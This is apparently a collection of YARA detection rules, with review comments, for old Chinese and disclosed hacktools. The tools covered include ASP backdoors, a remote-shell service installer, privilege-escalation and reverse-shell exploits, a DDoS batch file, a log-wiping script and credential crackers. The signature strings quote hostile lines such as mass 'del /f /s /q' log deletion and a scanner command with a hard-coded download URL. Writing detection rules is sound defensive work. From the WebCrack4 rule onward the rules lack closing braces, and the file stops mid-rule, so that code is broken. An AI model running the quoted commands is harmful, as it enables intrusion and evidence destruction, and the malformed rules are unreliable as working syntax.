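 * address. The VB runtime strings are generic; the mail address and the
 * registry key are the discriminators, and all seven strings are required.
 */
rule sig_238_eee {
	meta:
		description = "Disclosed hacktool set (old stuff) - file eee.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
	strings:
		$s0 = "szj1230@yesky.com" fullword wide
		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
		$s4 = "MailTo:szj1230@yesky.com" fullword wide
		$s5 = "Command1_Click" fullword ascii
		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
		$s11 = "vb5chs.dll" fullword ascii
		$s12 = "MSVBVM50.DLL" fullword ascii
	condition:
		all of them
}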
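/*
 * EDIR.ASP: a directory-listing web backdoor gated by a password cookie.
 * $s7 (FileSystemObject creation) is common in benign ASP; the
 * cookie-password check and the two "path" request handlers are the
 * specific parts. All five strings are required.
 */
rule aspbackdoor_EDIR {
	meta:
		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
	strings:
		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
		$s3 = "if Request.Cookies(\"password\")=\"" ascii
		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
		$s19 = "whichdir=Request(\"path\")" fullword ascii
	condition:
		all of them
}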
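/*
 * xpf.sys: a kernel driver exposing \Device\XScanPF and a DOS device
 * alias, with a debug message about unhooking IoGetDeviceObjectPointer.
 * Drivers are PE files, so the MZ check applies; the 25KB cap and all
 * three strings are required.
 */
rule dat_xpf {
	meta:
		description = "Chinese Hacktool Set - file xpf.sys"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "761125ab594f8dc996da4ce8ce50deba49c81846"
	strings:
		$s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii
		$s2 = "\\Device\\XScanPF" fullword wide
		$s3 = "\\DosDevices\\XScanPF" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 25KB and all of them
}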
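/*
 * rshsvc.bat: installer batch file for a remote-shell service (copies
 * rshsvc.exe/.dll into system32 and registers it via rshsetup). All seven
 * lines are required; as a text file there is no MZ guard.
 */
rule sig_238_rshsvc {
	meta:
		description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
	strings:
		$s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii
		$s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii
		$s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii
		$s10 = "copy %1\\rshsvc.exe" fullword ascii
		$s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii
		$s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii
		$s18 = "pushd %SystemRoot%\\system32" fullword ascii
	condition:
		all of them
}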
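/*
 * InjectT.exe from the WinEggDrop shell package: exe32pack packer marker,
 * the "2TInject.Dll" name and a few console strings. "Windows Services"
 * and the "Press Any Key" prompt are generic; all five strings are
 * required. No header or filesize guard.
 */
rule WinEggDropShellFinal_zip_Folder_InjectT {
	meta:
		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
	strings:
		$s0 = "Packed by exe32pack" ascii
		$s1 = "2TInject.Dll" fullword ascii
		$s2 = "Windows Services" fullword ascii
		$s3 = "Findrst6" fullword ascii
		$s4 = "Press Any Key To Continue......" fullword ascii
	condition:
		all of them
}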
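/*
 * gina.reg: a REGEDIT4 export that sets a "gina" value to "gina.dll" under
 * the Winlogon key. $s1 and $s2 occur in any exported Winlogon subtree;
 * $s0 is the discriminator. All three are required.
 */
rule sig_238_gina {
	meta:
		description = "Disclosed hacktool set (old stuff) - file gina.reg"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
	strings:
		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
		$s1 = "REGEDIT4" fullword ascii
		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
	condition:
		all of them
}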
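/*
 * ReactOS cmd.exe renamed to cmd.dll (iKAT "cloaked" command processor).
 * $s1-$s3 identify the ReactOS command processor; $ext is meant to tie the
 * match to a .dll file name. NOTE(review): $ext is a content string, so it
 * is only satisfied if the literal text "extension: .dll" appears in the
 * scanned data (for example if the scanner appends file metadata to the
 * buffer) — confirm this is how the rule is deployed, otherwise it never
 * fires on the binary itself.
 */
rule iKAT_cmd_as_dll {
	meta:
		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
		author = "Florian Roth"
		date = "05.11.14"
		score = 65
		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
	strings:
		$s1 = "cmd.exe" fullword wide
		$s2 = "ReactOS Development Team" fullword wide
		$s3 = "ReactOS Command Processor" fullword wide

		$ext = "extension: .dll" nocase
	condition:
		all of ($s*) and $ext
}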
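/*
 * pass.txt: a password list shipped with the "Burst" tool set. Individual
 * entries ("master", "changeme", "google.com") are common wordlist items;
 * requiring all eleven fullword entries in one file is what makes the
 * rule specific. Text file, so no MZ or filesize guard.
 */
rule Hacktools_CN_Burst_pass {
	meta:
		description = "Disclosed hacktool set - file pass.txt"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "55a05cf93dbd274355d798534be471dff26803f9"
	strings:
		$s0 = "123456.com" fullword ascii
		$s1 = "123123.com" fullword ascii
		$s2 = "360.com" fullword ascii
		$s3 = "123.com" fullword ascii
		$s4 = "juso.com" fullword ascii
		$s5 = "sina.com" fullword ascii
		$s7 = "changeme" fullword ascii
		$s8 = "master" fullword ascii
		$s9 = "google.com" fullword ascii
		$s10 = "chinanet" fullword ascii
		$s12 = "lionking" fullword ascii
	condition:
		all of them
}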
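/*
 * snifferport.exe: an iphlpapi-based port sniffer. Apart from the import
 * name the strings are truncated fragments ("ystem\\CurrentCorolSet\\",
 * "32Next", "V1.2 B") that look like remnants of a packed image —
 * NOTE(review): specific to this build. All five are required; no header
 * or filesize guard.
 */
rule snifferport {
	meta:
		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "d14133b5eaced9b7039048d0767c544419473144"
	strings:
		$s0 = "iphlpapi.DLL" fullword ascii
		$s5 = "ystem\\CurrentCorolSet\\" fullword ascii
		$s11 = "Port.TX" fullword ascii
		$s12 = "32Next" fullword ascii
		$s13 = "V1.2 B" fullword ascii
	condition:
		all of them
}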
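/*
 * NtGodMode.exe: short console fragments plus two truncated API names
 * that the generator flagged as goodware strings. None of the strings is
 * strong on its own; the rule depends on all five together with the MZ
 * header and the tight 45KB cap.
 */
rule NtGodMode {
	meta:
		description = "Chinese Hacktool Set - file NtGodMode.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "8baac735e37523d28fdb6e736d03c67274f7db77"
	strings:
		$s0 = "to HOST!" fullword ascii
		$s1 = "SS.EXE" fullword ascii
		$s5 = "lstrlen0" fullword ascii
		$s6 = "Virtual" fullword ascii  /* Goodware String - occured 6 times */
		$s19 = "RtlUnw" fullword ascii /* Goodware String - occured 1 times */
	condition:
		uint16(0) == 0x5a4d and filesize < 45KB and all of them
}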
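/*
 * tzddos: a batch driver that filters a result list into host.txt and
 * launches Http.exe once per host. All seven lines are required; text
 * file, so no MZ or filesize guard.
 */
rule Tzddos_DDoS_Tool_CN {
	meta:
		description = "Disclosed hacktool set - file tzddos"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
	strings:
		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
		$s2 = "del host.txt /q" fullword ascii
		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
		$s4 = "start Http.exe %%a %http%" fullword ascii
		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
	condition:
		all of them
}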
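/*
 * RunAsEx.exe: runs a program under supplied credentials on a remote
 * machine ("Can'nt Run With Local Machine"). Identified by its banner,
 * usage line and status messages; "cmd.bat" and "winsta0" are generic.
 * 4 of 6 strings are required; no header or filesize guard.
 */
rule sig_238_RunAsEx {
	meta:
		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
	strings:
		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
		$s8 = "cmd.bat" fullword ascii
		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
		$s11 = "%s Execute Succussifully." fullword ascii
		$s12 = "winsta0" fullword ascii
		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
	condition:
		4 of them
}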
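/*
 * Clear.bat: an anti-forensic cleanup script that deletes logs, temp
 * files, cookies and recycle-bin contents. Note that the trailing spaces
 * inside the quoted strings are part of the pattern, so a reformatted copy
 * of the script will not match. 5 of 9 lines are required; text file, so
 * no MZ or filesize guard.
 */
rule Hacktools_CN_Burst_Clear {
	meta:
		description = "Disclosed hacktool set - file Clear.bat"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
	strings:
		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
	condition:
		5 of them
}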
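/*
 * Generic rule for tiny (<15KB) network tools, derived from WinEggDrop
 * scanner samples: a base import set ($s*) plus one of three import
 * profiles. The original rule declared the shared names several times
 * under $y*/$x*/$z* prefixes; each import is now declared once and the
 * three profiles are spelled out in the condition:
 *   y: WININET.DLL + atoi
 *   x: ADVAPI32.DLL + USER32.DLL + wsock32.dll + FreeSid + atoi
 *   z: ADVAPI32.DLL + USER32.DLL + FreeSid + ToAscii
 * The two-byte `$magic at 0` string is replaced by the equivalent
 * uint16(0) == 0x5a4d check (same bytes, no string atom to scan for),
 * and filesize is tested before the string sets so large files
 * short-circuit. Import names are ubiquitous, hence the low score of 40.
 */
rule Tiny_Network_Tool_Generic {
	meta:
		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
		author = "Florian Roth"
		date = "08.10.2014"
		score = 40
		type = "file"
		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
		hash1 = "cafc31d39c1e4721af3ba519759884b9"
		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
	strings:
		/* base set: required by every profile */
		$s0 = "KERNEL32.DLL" fullword ascii
		$s1 = "CRTDLL.DLL" fullword ascii
		$s3 = "LoadLibraryA" fullword ascii
		$s4 = "GetProcAddress" fullword ascii

		/* profile members, each declared once */
		$wininet = "WININET.DLL" fullword ascii
		$advapi = "ADVAPI32.DLL" fullword ascii
		$user32 = "USER32.DLL" fullword ascii
		$wsock = "wsock32.dll" fullword ascii
		$freesid = "FreeSid" fullword ascii
		$atoi = "atoi" fullword ascii
		$toascii = "ToAscii" fullword ascii

	condition:
		uint16(0) == 0x5a4d and filesize < 15KB and all of ($s*) and
		(
			( $wininet and $atoi ) or
			( $advapi and $user32 and $wsock and $freesid and $atoi ) or
			( $advapi and $user32 and $freesid and $toascii )
		)
}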
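/*
 * Unmodified ReactOS cmd.exe: version-resource strings of the ReactOS
 * command processor. The binary is legitimate open-source software and is
 * only interesting when it turns up outside a ReactOS install, which the
 * informational score of 30 reflects. All four wide strings are required;
 * no MZ or filesize guard.
 */
rule ReactOS_cmd_valid {
	meta:
		description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
		author = "Florian Roth"
		date = "05.11.14"
		reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
		score = 30
		hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
	strings:
		$s1 = "ReactOS Command Processor" fullword wide
		$s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide
		$s3 = "Eric Kohl and others" fullword wide
		$s4 = "ReactOS Operating System" fullword wide
	condition:
		all of ($s*)
}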
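/*
 * xiaoa.exe (system_exp.exe): a Windows kernel local privilege-escalation
 * tool, matched on its usage text and status messages. Only 2 of 6
 * strings are needed; $s3 ("Not Windows NT family OS.") is the most
 * generic of them, the rest are specific. MZ header and 100KB cap apply.
 */
rule OtherTools_xiaoa {
	meta:
		description = "Chinese Hacktool Set - file xiaoa.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "6988acb738e78d582e3614f83993628cf92ae26d"
	strings:
		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
		$s2 = "The shell \"cmd\" success!" fullword ascii
		$s3 = "Not Windows NT family OS." fullword ascii /* PEStudio Blacklist: os */
		$s4 = "Unable to get kernel base address." fullword ascii
		$s5 = "run \"%s\" failed,code: %d" fullword ascii
		$s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}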
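/*
 * s.exe: the WinEggDrop TCP/SYN port scanner, identified by its console
 * banner, usage examples and progress messages. 5 of 11 strings are
 * required; no header or filesize guard.
 */
rule Hacktools_CN_WinEggDrop {
	meta:
		description = "Disclosed hacktool set - file s.exe"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
	strings:
		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
		$s8 = "Something Wrong About The Ports" fullword ascii
		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
	condition:
		5 of them
}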
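/*
 * xai.exe by "C.Rufus Security Team": credit strings and a vendor site
 * are the discriminators; the environment-variable path prefixes ($s2,
 * $s3, $s6) and "GetRand.dll" are generic. All seven strings plus MZ
 * header and a 3000KB cap are required.
 */
rule Pc_xai {
	meta:
		description = "Chinese Hacktool Set - file xai.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
	strings:
		$s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" fullword wide
		$s2 = "%SystemRoot%\\System32\\" fullword ascii
		$s3 = "%APPDATA%\\" fullword ascii
		$s4 = "---- C.Rufus Security Team ----" fullword wide
		$s5 = "www.snzzkz.com" fullword wide
		$s6 = "%CommonProgramFiles%\\" fullword ascii
		$s7 = "GetRand.dll" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}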
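/*
 * fscan.exe v1.12, the Foundstone command-line port scanner: help text,
 * example invocation, error messages and the file name. This is a
 * legitimate administration tool that is also carried in attacker
 * toolkits, so context matters when it fires. 4 of 9 strings are
 * required; no header or filesize guard.
 */
rule sig_238_fscan {
	meta:
		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
	strings:
		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
		$s13 = "http://www.foundstone.com" fullword ascii
		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
		$s18 = "Bind port number out of range. Using system default." fullword ascii
		$s19 = "fscan.exe" fullword wide
	condition:
		4 of them
}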
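/*
 * debug.exe: a WMI-based exploit that spawns a reverse shell; the
 * progress messages ($s1, $s2, $s6, $s7) and the IIsWebInfo query are the
 * specific strings. NOTE(review): the condition needs 3 of 7, and $s0 (a
 * Documents and Settings path) and $s10 ("wmiprvse.exe", the name of the
 * legitimate WMI provider host) are generic, so only one specific string
 * is actually required for a match.
 */
rule FreeVersion_debug {
	meta:
		description = "Chinese Hacktool Set - file debug.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
	strings:
		$s0 = "c:\\Documents and Settings\\Administrator\\" fullword ascii
		$s1 = "Got WMI process Pid: %d" ascii
		$s2 = "This exploit will execute" ascii
		$s6 = "Found token %s " ascii
		$s7 = "Running reverse shell" ascii
		$s10 = "wmiprvse.exe" fullword ascii
		$s12 = "SELECT * FROM IIsWebInfo" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 820KB and 3 of them
}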
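/*
 * Second component of a Chinese MSSQL (port 1433) scanner. The two-byte
 * `$magic at 0` string is replaced by the equivalent uint16(0) == 0x5a4d
 * header check, which matches the same bytes without a short string atom
 * to scan for. $s0 is a four-character wide string and $s1 a partial one;
 * the long repeating pattern in $s2 carries most of the specificity. All
 * $s* strings are required. No hash is recorded, hence score 40.
 */
rule CN_Hacktool_1433_Scanner_Comp2 {
	meta:
		description = "Detects a chinese MSSQL scanner - component 2"
		author = "Florian Roth"
		score = 40
		date = "12.10.2014"
	strings:
		$s0 = "1433" wide fullword
		$s1 = "1433V" wide
		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
	condition:
		uint16(0) == 0x5a4d and all of ($s*)
}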
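/*
 * IdtTool.sys: a small kernel driver exposing \Device\devIdtTool. The
 * four Io* imports are present in almost every driver (the generator's
 * goodware counts say as much); the device name is the only specific
 * string, backed by the MZ header and a very tight 7KB cap. All five are
 * required.
 */
rule IDTools_For_WinXP_IdtTool_2 {
	meta:
		description = "Chinese Hacktool Set - file IdtTool.sys"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
	strings:
		$s0 = "\\Device\\devIdtTool" fullword wide
		$s1 = "IoDeleteSymbolicLink" fullword ascii  /* Goodware String - occured 467 times */
		$s3 = "IoDeleteDevice" fullword ascii  /* Goodware String - occured 993 times */
		$s6 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */
		$s7 = "IoCreateDevice" fullword ascii /* Goodware String - occured 988 times */
	condition:
		uint16(0) == 0x5a4d and filesize < 7KB and all of them
}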
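/*
 * Burst.rar: single-string rule on a command line that runs sql.exe
 * against an IP list with a hard-coded download URL. NOTE(review): the
 * described target is a RAR archive; a plain-text string inside a
 * compressed archive only matches if that member is stored uncompressed
 * (or the text sits in the archive comment) — confirm against the
 * referenced hash. The URL doubles as a network indicator.
 */
rule Hacktools_CN_Panda_Burst {
	meta:
		description = "Disclosed hacktool set - file Burst.rar"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
	strings:
		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
	condition:
		all of them
}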
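/*
 * Antiy Ports 1.21.exe: an MFC port tool identified by its executable
 * name and application title (wide) plus one ASCII fragment. All three
 * strings are required; no header or filesize guard.
 */
rule Antiy_Ports_1_21 {
	meta:
		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
	strings:
		$s0 = "AntiyPorts.EXE" fullword wide
		$s7 = "AntiyPorts MFC Application" fullword wide
		$s20 = " @Stego:" fullword ascii
	condition:
		all of them
}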
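/*
 * WSockExpert.exe: a Winsock hooking sniffer ("WSockHook.DLL") with a
 * vendor URL and OpenProcess/filter command handlers. $s3 is a runtime
 * date/time validation message and $s5 a property name, both generic;
 * with 4 of 6 required at least two specific strings must be present.
 * MZ header and 2500KB cap apply.
 */
rule WSockExpert {
	meta:
		description = "Chinese Hacktool Set - file WSockExpert.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"
	strings:
		$s1 = "OpenProcessCmdExecute!" fullword ascii
		$s2 = "http://www.hackp.com" fullword ascii
		$s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
		$s4 = "SaveSelectedFilterCmdExecute" fullword ascii
		$s5 = "PasswordChar@" fullword ascii
		$s6 = "WSockHook.DLL" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them
}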
rule WebCrack4_RouterPasswordCracking {
	// Chinese hacktool set, WebCrack4-RouterPasswordCracking.exe: credential-template and
	// result-format strings, plus a fixed legacy User-Agent.
	meta:
		description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"
		date = "2015-06-13"
	strings:
		$s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" ascii fullword
		$s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" ascii fullword
		$s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" ascii fullword
		$s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" ascii fullword
		$s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
	condition:
		// PE magic, size bound, and any two of the strings.
		filesize < 5000KB and uint16(0) == 0x5A4D and 2 of ($s*)
rule PwDump {
	// PwDump 6 variant: usage banner, service-status error text and version banner.
	meta:
		description = "PwDump 6 variant"
		author = "Marc Stroebel"
		date = "2014-04-24"
		score = 70
	strings:
		// No modifier in the original means ascii; made explicit here.
		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" ascii fullword
		$s6 = "Unable to query service status. Something is wrong, please manually check the st" ascii
		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa" ascii
	condition:
		all of ($s*)
rule iKAT_command_lines_agent {
	// iKAT hack tool set agent, ikat.exe: tracker-module text embedded in the template binary.
	meta:
		description = "iKAT hack tools set agent - file ikat.exe"
		author = "Florian Roth"
		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
		date = "05.11.14"
		score = 75
	strings:
		$s12 = "iKAT Exe Template" ascii fullword
		$s0 = "Extended Module: super mario brothers" ascii fullword
		$s1 = "Extended Module: " ascii fullword
		$s3 = "ofpurenostalgicfeeling" ascii fullword
		$s8 = "-supermariobrotheretic" ascii fullword
		$s9 = "!http://132.147.96.202:80" ascii fullword
		$s15 = "withadancyflavour.." ascii fullword
		$s16 = "FastTracker v2.00   " ascii fullword
	condition:
		// No header or size check; four of the eight strings suffice.
		4 of ($s*)
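rule CN_Tools_srss_2 {
	// Chinese hacktool set, srss.exe: a very small PE carrying the "used pepack!" tag
	// together with a fixed set of Win32 API / module names.
	meta:
		description = "Chinese Hacktool Set - file srss.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
	strings:
		$x1 = "used pepack!" fullword ascii

		// Every $s string is required by the condition.
		$s1 = "KERNEL32.dll" fullword ascii
		$s2 = "KERNEL32.DLL" fullword ascii
		$s3 = "LoadLibraryA" fullword ascii
		$s4 = "GetProcAddress" fullword ascii
		$s5 = "VirtualProtect" fullword ascii
		$s6 = "VirtualAlloc" fullword ascii
		$s7 = "VirtualFree" fullword ascii
		$s8 = "ExitProcess" fullword ascii
	condition:
		// NOTE(review): the original condition required "( $x1 at 0 )" together with
		// uint16(0) == 0x5a4d. Both cannot hold at once (offset 0 must be "MZ"), so the
		// rule could never match. The intended offset of the tag is not recoverable from
		// this listing, so $x1 is now only required to be present; the 14KB size bound and
		// the full $s list still keep the match narrow.
		uint16(0) == 0x5a4d and $x1 and filesize < 14KB and all of ($s*)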
rule churrasco {
	// Chinese hacktool set, churrasco.exe: status messages printed while impersonating tokens.
	meta:
		description = "Chinese Hacktool Set - file churrasco.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
		date = "2015-06-13"
	strings:
		$s5 = "Thread not impersonating, looking for another thread..." ascii
		$s4 = "Found SYSTEM token 0x%x" ascii
		$s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
		$s2 = "Running command with SYSTEM Token..." ascii
		$s1 = "Done, command should have ran as SYSTEM!" ascii
	condition:
		// PE magic, small file, any two messages.
		filesize < 150KB and uint16(0) == 0x5A4D and 2 of ($s*)
rule GoodToolset_pr {
	// Chinese hacktool set, pr.exe: console output strings and the WMI host / IIS namespace it names.
	meta:
		description = "Chinese Hacktool Set - file pr.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
		date = "2015-06-13"
	strings:
		$s6 = "root\\MicrosoftIISv2" wide fullword
		$s5 = "-->Build&&Change By p " ascii
		$s4 = "Try the first %d time" ascii fullword
		$s3 = "wmiprvse.exe" ascii fullword
		$s2 = "-->This exploit gives you a Local System shell " ascii
		$s1 = "-->Got WMI process Pid: %d " ascii
	condition:
		// All six strings are required.
		filesize < 200KB and uint16(0) == 0x5A4D and all of ($s*)
rule aspbackdoor_asp3 {
	// Disclosed hacktool set (old stuff), asp3.txt: fragments of an ASP password-change page.
	meta:
		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
		author = "Florian Roth"
		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
		date = "23.11.14"
		score = 60
	strings:
		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " ascii fullword
		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " ascii fullword
		$s18 = "OldPwd = Request.Form(\"OldPwd\") " ascii fullword
		$s16 = " WIndows 2000 " ascii fullword
		$s14 = " Windows NT " ascii fullword
		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " ascii fullword
		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " ascii fullword
		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " ascii fullword
	condition:
		// Text file, so no PE magic; every fragment must be present.
		all of ($s*)
rule Radmin_Hash {
	// Chinese hacktool set, Radmin_Hash.exe: PECompact2 marker plus Radmin hash-tool UI strings.
	meta:
		description = "Chinese Hacktool Set - file Radmin_Hash.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
		date = "2015-06-13"
	strings:
		$s5 = "HASH1.0" wide fullword
		$s4 = "Radmin 3.0 Hash " wide fullword
		$s3 = "Radmin, Remote Administrator" wide fullword
		$s2 = "PECompact2" ascii fullword
		$s1 = "<description>IEBars</description>" ascii fullword
	condition:
		filesize < 600KB and uint16(0) == 0x5A4D and all of ($s*)
rule _FsHttp_FsPop_FsSniffer {
	// Disclosed hacktool set (old stuff), super rule over FsHttp.exe, FsPop.exe and
	// FsSniffer.exe: POP3-style +OK/-ERR protocol replies shared by the three binaries.
	meta:
		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
		author = "Florian Roth"
		super_rule = 1
		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
